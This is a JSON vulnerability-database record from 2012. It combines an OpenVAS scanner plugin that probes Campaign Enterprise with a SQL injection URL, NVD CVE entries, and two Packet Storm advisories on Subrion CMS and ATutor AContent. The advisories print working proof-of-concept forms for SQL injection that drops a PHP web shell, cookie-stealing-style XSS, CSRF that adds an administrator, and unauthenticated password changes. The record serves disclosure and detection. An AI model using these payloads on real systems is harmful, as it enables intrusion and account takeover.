{"openvas": [{"lastseen": "2018-09-02T00:00:13", "references": ["http://www.arialsoftware.com/enterprise.htm", "http://www.securityfocus.com/bid/56117"], "pluginID": "1361412562310103586", "description": "Campaign Enterprise is prone to multiple security vulnerabilities\nincluding:\n\n1. Multiple security-bypass vulnerabilities\n\n2. Multiple information-disclosure vulnerabilities\n\n3. Multiple SQL injection vulnerabilities", "edition": 4, "reporter": "This script is Copyright (C) 2012 Greenbone Networks GmbH", "published": "2012-10-22T00:00:00", "title": "Campaign Enterprise Multiple Security Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3820", "CVE-2012-3821", "CVE-2012-3824", "CVE-2012-3823", "CVE-2012-3822"], "modified": "2018-08-28T00:00:00", "id": "OPENVAS:1361412562310103586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103586", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_campaign_enterprise_56117.nasl 11144 2018-08-28 11:37:19Z asteins $\n#\n# Campaign Enterprise Multiple Security Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103586\");\n script_bugtraq_id(56117);\n script_cve_id(\"CVE-2012-3820\", \"CVE-2012-3821\", \"CVE-2012-3822\", \"CVE-2012-3823\", \"CVE-2012-3824\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 11144 $\");\n script_name(\"Campaign Enterprise Multiple Security Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/56117\");\n script_xref(name:\"URL\", value:\"http://www.arialsoftware.com/enterprise.htm\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-28 13:37:19 +0200 (Tue, 28 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-22 13:15:10 +0200 (Mon, 22 Oct 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"Campaign Enterprise is prone to multiple security vulnerabilities\nincluding:\n\n1. Multiple security-bypass vulnerabilities\n\n2. Multiple information-disclosure vulnerabilities\n\n3. Multiple SQL injection vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to bypass certain security\nrestrictions, obtain sensitive information, and carry out\nunauthorized actions on the underlying database. Other attacks may\nalso be possible.\");\n\n script_tag(name:\"affected\", value:\"Campaign Enterprise 11.0.538 is vulnerable.\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\nif( ! can_host_asp( port:port ) ) exit( 0 );\n\nforeach dir( make_list_unique( \"/\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + '/User-Edit.asp?UID=1%20OR%201=1';\n\n if( http_vuln_check( port:port, url:url, pattern:\"<title>Campaign Enterprise\", extra_check:make_list( \">Logout</a>\", \"Edit User\", \"Admin Rights\" ) ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2017-08-29T12:17:48", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/79469", "http://packetstormsecurity.org/files/116433", "http://packetstormsecurity.org/files/117460/Subrion-CMS-2.2.1-XSS-CSRF-SQL-Injection.html", "http://www.subrion.com/forums/announcements/934-subrion-2-2-3-open-source-cms-core-available.html", "https://www.htbridge.com/advisory/HTB23113", "http://archives.neohapsis.com/archives/bugtraq/2012-10/0096.html", "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5106.php", "https://exchange.xforce.ibmcloud.com/vulnerabilities/78469"], "edition": 2, "description": "Multiple cross-site request forgery (CSRF) vulnerabilities in Subrion CMS before 2.2.3 allow remote attackers to hijack the authentication of administrators for requests that add, delete, or modify sensitive information, as demonstrated by adding an administrator account via an add action to admin/accounts/add/.", "reporter": "NVD", "published": "2012-10-22T19:55:08", "title": "CVE-2012-4773", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-4773"], "scanner": [], "cpe": ["cpe:/a:intelliants:subrion_cms:2.2.0", "cpe:/a:intelliants:subrion_cms:2.0.4", "cpe:/a:intelliants:subrion_cms:2.2.2", "cpe:/a:intelliants:subrion_cms:2.2.1"], "modified": "2017-08-28T21:32:21", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4773", "id": "CVE-2012-4773", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-05T11:05:40", "references": ["https://www.htbridge.com/advisory/HTB23115", "https://www.exploit-db.com/exploits/21742/", "http://www.securityfocus.com/bid/55766"], "edition": 2, "description": "Cross-site scripting (XSS) vulnerability in Template CMS 2.1.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the themes_editor parameter in an add_template action to admin/index.php.", "reporter": "NVD", "published": "2015-05-20T15:59:00", "title": "CVE-2012-4901", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-4901"], "scanner": [], "cpe": ["cpe:/a:template_cms_project:template_cms:2.1.1"], "modified": "2017-10-04T21:29:02", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4901", "id": "CVE-2012-4901", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-08-29T12:17:46", "references": ["http://jcore.net/news/jcore-ver-10pre2-available-for-testing", "http://archives.neohapsis.com/archives/bugtraq/2012-10/0097.html", "https://www.htbridge.com/advisory/HTB23107", "https://exchange.xforce.ibmcloud.com/vulnerabilities/79442", "http://www.securityfocus.com/bid/56102"], "edition": 2, "description": "SQL injection vulnerability in admin/index.php in jCore before 1.0pre2 allows remote attackers to execute arbitrary SQL commands via the memberloginid cookie.", "reporter": "NVD", "published": "2012-10-22T19:55:06", "title": "CVE-2012-4232", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-4232"], "scanner": [], "cpe": ["cpe:/a:jcore:jcore:1.0:pre1"], "modified": "2017-08-28T21:32:14", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4232", "id": "CVE-2012-4232", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T12:17:48", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/79468", "http://packetstormsecurity.org/files/117460/Subrion-CMS-2.2.1-XSS-CSRF-SQL-Injection.html", "http://www.subrion.com/forums/announcements/934-subrion-2-2-3-open-source-cms-core-available.html", "https://www.htbridge.com/advisory/HTB23113", "http://archives.neohapsis.com/archives/bugtraq/2012-10/0096.html", "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5105.php"], "edition": 2, "description": "Multiple cross-site scripting (XSS) vulnerabilities in Subrion CMS before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) admin/accounts/, (2) admin/manage/, or (3) admin/manage/blocks/edit/; or (4) group parameter to admin/configuration/. NOTE: The f[accounts][fullname] and f[accounts][username] vectors are covered in CVE-2012-5452.", "reporter": "NVD", "published": "2012-10-22T19:55:08", "title": "CVE-2012-4771", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-4771"], "scanner": [], "cpe": ["cpe:/a:intelliants:subrion_cms:2.2.0", "cpe:/a:intelliants:subrion_cms:2.0.4", "cpe:/a:intelliants:subrion_cms:2.2.2", "cpe:/a:intelliants:subrion_cms:2.2.1"], "modified": "2017-08-28T21:32:21", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4771", "id": "CVE-2012-4771", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-10-05T11:05:40", "references": ["https://www.htbridge.com/advisory/HTB23115", "https://www.exploit-db.com/exploits/21742/", "http://www.securityfocus.com/bid/55766"], "edition": 2, "description": "Multiple cross-site request forgery (CSRF) vulnerabilities in Template CMS 2.1.1 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator user via an add action to admin/index.php or (2) conduct static PHP code injection attacks via the themes_editor parameter in an edit_template action to admin/index.php.", "reporter": "NVD", "published": "2015-05-20T15:59:01", "title": "CVE-2012-4902", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-4902"], "scanner": [], "cpe": ["cpe:/a:template_cms_project:template_cms:2.1.1"], "modified": "2017-10-04T21:29:02", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4902", "id": "CVE-2012-4902", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T12:17:44", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/79507", "http://sadgeeksinsnow.blogspot.dk/2012/10/my-first-experiences-bug-hunting-part-2.html"], "edition": 2, "description": "Multiple SQL injection vulnerabilities in Campaign11.exe in Arial Software Campaign Enterprise before 11.0.551 allow remote attackers to execute arbitrary SQL commands via the (1) SerialNumber field to activate.asp or (2) UID field to User-Edit.asp.", "reporter": "NVD", "published": "2014-08-14T10:55:04", "title": "CVE-2012-3820", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-3820"], "scanner": [], "cpe": ["cpe:/a:arialsoftware:campaign_enterprise:11.0.538"], "modified": "2017-08-28T21:32:05", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3820", "id": "CVE-2012-3820", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T12:17:50", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/79463", "http://archives.neohapsis.com/archives/bugtraq/2012-10/0095.html", "https://www.htbridge.com/advisory/HTB23117", "http://www.securityfocus.com/bid/56100", "http://update.atutor.ca/acontent/patch/1_2/"], "edition": 2, "description": "Multiple cross-site scripting (XSS) vulnerabilities in file_manager/preview_top.php in ATutor AContent before 1.2-2 allow remote attackers to inject arbitrary web script or HTML via the (1) pathext, (2) popup, (3) framed, or (4) file parameter.", "reporter": "NVD", "published": "2012-10-22T19:55:10", "title": "CVE-2012-5169", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-5169"], "scanner": [], "cpe": ["cpe:/a:atutor:acontent:1.2", "cpe:/a:atutor:acontent:1.2:1"], "modified": "2017-08-28T21:32:32", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5169", "id": "CVE-2012-5169", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-08-29T12:17:50", "references": ["http://archives.neohapsis.com/archives/bugtraq/2012-10/0095.html", "https://www.htbridge.com/advisory/HTB23117", "https://exchange.xforce.ibmcloud.com/vulnerabilities/79460", "http://www.securityfocus.com/bid/56100", "http://update.atutor.ca/acontent/patch/1_2/", "https://exchange.xforce.ibmcloud.com/vulnerabilities/79459"], "edition": 2, "description": "Multiple SQL injection vulnerabilities in ATutor AContent before 1.2-1 allow remote attackers to execute arbitrary SQL commands via the (1) field parameter to course_category/index_inline_editor_submit.php or (2) user/index_inline_editor_submit.php; or (3) id parameter to user/user_password.php.", "reporter": "NVD", "published": "2012-10-22T19:55:09", "title": "CVE-2012-5167", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-5167"], "scanner": [], "cpe": ["cpe:/a:atutor:acontent:1.2"], "modified": "2017-08-28T21:32:32", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5167", "id": "CVE-2012-5167", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T12:17:49", "references": ["https://www.htbridge.com/advisory/HTB23116", "https://exchange.xforce.ibmcloud.com/vulnerabilities/79199", "http://archives.neohapsis.com/archives/bugtraq/2012-10/0065.html", "https://svn.openx.org/openx/trunk/www/admin/campaign-zone-link.php", "http://www.securityfocus.com/bid/55860"], "edition": 2, "description": "SQL injection vulnerability in admin/campaign-zone-link.php in OpenX 2.8.10 before revision 81823 allows remote attackers to execute arbitrary SQL commands via the ids[] parameter in a link action.", "reporter": "NVD", "published": "2012-10-22T19:55:09", "title": "CVE-2012-4990", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-4990"], "scanner": [], "cpe": ["cpe:/a:openx:openx:2.8.10"], "modified": "2017-08-28T21:32:26", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4990", "id": "CVE-2012-4990", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T12:17:46", "references": ["http://jcore.net/news/jcore-ver-10pre2-available-for-testing", "http://archives.neohapsis.com/archives/bugtraq/2012-10/0097.html", "https://www.htbridge.com/advisory/HTB23107", "http://www.securityfocus.com/bid/56102", "https://exchange.xforce.ibmcloud.com/vulnerabilities/79441"], "edition": 2, "description": "Cross-site scripting (XSS) vulnerability in admin/index.php in jCore before 1.0pre2 allows remote attackers to inject arbitrary web script or HTML via the path parameter.", "reporter": "NVD", "published": "2012-10-22T19:55:06", "title": "CVE-2012-4231", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-4231"], "scanner": [], "cpe": ["cpe:/a:jcore:jcore:1.0:pre1"], "modified": "2017-08-28T21:32:14", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4231", "id": "CVE-2012-4231", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:38", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2012-10-18T00:00:00", "type": "packetstorm", "title": "Subrion CMS 2.2.1 XSS / CSRF / SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4771", "CVE-2012-4772", "CVE-2012-4773"], "modified": "2012-10-18T00:00:00", "href": "https://packetstormsecurity.com/files/117460/Subrion-CMS-2.2.1-XSS-CSRF-SQL-Injection.html", "id": "PACKETSTORM:117460", "sourceData": "`Advisory ID: HTB23113 \nProduct: Subrion CMS \nVendor: The Subrion development team \nVulnerable Version(s): 2.2.1 and probably prior \nTested Version: 2.2.1 \nVendor Notification: September 5, 2012 \nPublic Disclosure: October 17, 2012 \nVulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352] \nCVE References: CVE-2012-4771, CVE-2012-4772, CVE-2012-4773 \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Subrion CMS, which can be exploited to perform Cross-Site Scripting (XSS), SQL Injection and \u0421ross-Site Request Forgery (CSRF) attacks. \n \n \n1) SQL Injection in Subrion CMS: CVE-2012-4772 \n \nInput passed via the \"plan_id\" POST parameter to /register/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/register/\" method=\"post\"> \n<input type=\"hidden\" name=\"username\" value='username' /> \n<input type=\"hidden\" name=\"fullname\" value='fullname' /> \n<input type=\"hidden\" name=\"email\" value='username@mail.com' /> \n<input type=\"hidden\" name=\"password\" value='password' /> \n<input type=\"hidden\" name=\"password2\" value='password' /> \n<input type=\"hidden\" name=\"security_code\" value='[CAPTCHA]' /> \n<input type=\"hidden\" name=\"plan_id\" value=\"0 UNION SELECT '<? system($cmd); ?>',1,1,1,1,1,1,1,1,1,1,1,1,1 INTO OUTFILE '../../../path/to/site/file.php'\" /> \n<input type=\"hidden\" name=\"register\" value=\"\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nDepending on web and SQL servers configuration, the above-mentioned PoC code creates a simple PHP shell on the vulnerable system. \n \n \n2) Cross-Site Scripting (XSS) in Subrion CMS: CVE-2012-4771 \n \n2.1 Input passed via the \"f[accounts][fullname]\" and \"f[accounts][username]\" GET parameters to /advsearch/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/advsearch/\" method=\"post\"> \n<input type=\"hidden\" name=\"items[]\" value='accounts' /> \n<input type=\"hidden\" name=\"f[accounts][fullname]\" value='\"><script>alert(document.cookie);</script>' /> \n<input type=\"hidden\" name=\"f[accounts][username]\" value='\"><script>alert(document.cookie);</script>' /> \n<input type=\"hidden\" name=\"q\" value='' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n2.2 Input passed via the \"id\" and \"group\" GET parameters to multiple files is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website. \n \nThe following PoCs demonstrate the vulnerabilities: \n \nhttp://[host]/admin/accounts/edit/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \nhttp://[host]/admin/configuration/?group=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \nhttp://[host]/admin/manage/fields/edit/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \nhttp://[host]/admin/manage/blocks/edit/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n \n3) \u0421ross-Site Request Forgery (CSRF) in Subrion CMS: CVE-2012-4773 \n \nThe application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary SQL code. \n \nAn attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability. \n \nThe following PoC creates administrative account within application: \n \n \n<form action=\"http://[host]/admin/accounts/add/\" method=\"post\"> \n<input type=\"hidden\" name=\"username\" value='new_admin' /> \n<input type=\"hidden\" name=\"fullname\" value='new_admin' /> \n<input type=\"hidden\" name=\"email\" value='new_admin@mail.com' /> \n<input type=\"hidden\" name=\"usergroup\" value='1' /> \n<input type=\"hidden\" name=\"status\" value='active' /> \n<input type=\"hidden\" name=\"_password\" value='_password' /> \n<input type=\"hidden\" name=\"_password2\" value='_password' /> \n<input type=\"hidden\" name=\"save\" value=\"Add\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.getElementById('btn').click(); \n</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpgrade to Subrion 2.2.3 \n \nMore Information: \nhttp://www.subrion.com/forums/announcements/934-subrion-2-2-3-open-source-cms-core-available.html \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23113 - https://www.htbridge.com/advisory/HTB23113 - Multiple vulnerabilities in Subrion CMS. \n[2] Subrion CMS - http://www.subrion.com/ - Subrion CMS is a stand-alone PHP content management system that is very easy to use. It comes with a ton of great features including full source editing, per-page permissions, user activity monitoring, and much more. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/117460/subrioncms-sqlxssxsrf.txt"}, {"lastseen": "2016-12-05T22:12:08", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2012-10-18T00:00:00", "type": "packetstorm", "title": "ATutor AContent 1.2 XSS / Authentication / SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5167", "CVE-2012-5168", "CVE-2012-5169"], "modified": "2012-10-18T00:00:00", "href": "https://packetstormsecurity.com/files/117459/ATutor-AContent-1.2-XSS-Authentication-SQL-Injection.html", "id": "PACKETSTORM:117459", "sourceData": "`Advisory ID: HTB23117 \nProduct: AContent \nVendor: ATutor \nVulnerable Version(s): 1.2 and probably prior \nTested Version: 1.2 \nVendor Notification: September 26, 2012 \nPublic Disclosure: October 17, 2012 \nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Cross-Site Scripting [CWE-79] \nCVE References: CVE-2012-5167, CVE-2012-5168, CVE-2012-5169 \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks. \n \n \n1) SQL Injection in AContent: CVE-2012-5167 \n \n1.1 The vulnerability exists due to insufficient sanitation of input data in the \"field\" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database. \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/course_category/index_inline_editor_submit.php\" method=\"post\"> \n<input type=\"hidden\" name=\"field\" value=\"category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))\" /> \n<input type=\"hidden\" name=\"value\" value=\"1\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n1.2 The vulnerability exists due to insufficient sanitation of input data in the \"field\" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database. \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n<form action=\"http://[host]/user/index_inline_editor_submit.php\" method=\"post\"> \n<input type=\"hidden\" name=\"field\" value=\"password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1\" /> \n<input type=\"hidden\" name=\"value\" value=\"1\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n1.3 Input passed via the \"id\" GET parameter to /user/user_password.php in POST request is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/user/user_password.php?id=1' AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20--%20\" method=\"post\"> \n<input type=\"hidden\" name=\"submit\" value=\"1\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nSuccessful exploitation of vulnerability 1.3 requires attacker to be registered and logged-in. \n \n \n2) Improper Authentication in AContent: CVE-2012-5168 \n \n2.1 The vulnerability exists due to absent authentication in the \"/user/index_inline_editor_submit.php\" script. A remote unauthorized attacker can change users' passwords. \n \nThe following example will change password for user with id=1 to 'password'. \n \n \n<form action=\"http://[host]/user/index_inline_editor_submit.php\" method=\"post\"> \n<input type=\"hidden\" name=\"field\" value=\"password-1\" /> \n<input type=\"hidden\" name=\"value\" value=\"5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n2.2 The vulnerability exists due to absent authentication in the \"/course_category/index_inline_editor_submit.php\" script. A remote unauthorized attacker can modify names for existing categories. \n \nThe following example will change category name with id=1 to 'new_category': \n \n \n<form action=\"http://[host]/course_category/index_inline_editor_submit.php\" method=\"post\"> \n<input type=\"hidden\" name=\"field\" value=\"category_name-1\" /> \n<input type=\"hidden\" name=\"value\" value=\"new_category\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n3) Cross-Site Scripting (XSS) in AContent: CVE-2012-5169 \n \nInput passed via the HTTP GET parameters \"pathext\", \"popup\", \"framed\", and \"file\" to /file_manager/preview_top.php is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website. \n \nThe following PoCs (Proof of Concept) demonstrate the vulnerabilities: \n \nhttp://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \nhttp://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \nhttp://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \nhttp://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUsers should apply patches #1 and #2 using the AContent Administrator's Updater tool \n \nMore Information: \nhttp://update.atutor.ca/acontent/patch/1_2/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23117 - https://www.htbridge.com/advisory/HTB23117 - Multiple vulnerabilities in AContent. \n[2] AContent - http://atutor.ca - AContent is an open source learning content authoring system and respository used to create interoperable, accessible, adaptive Web-based learning content. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the 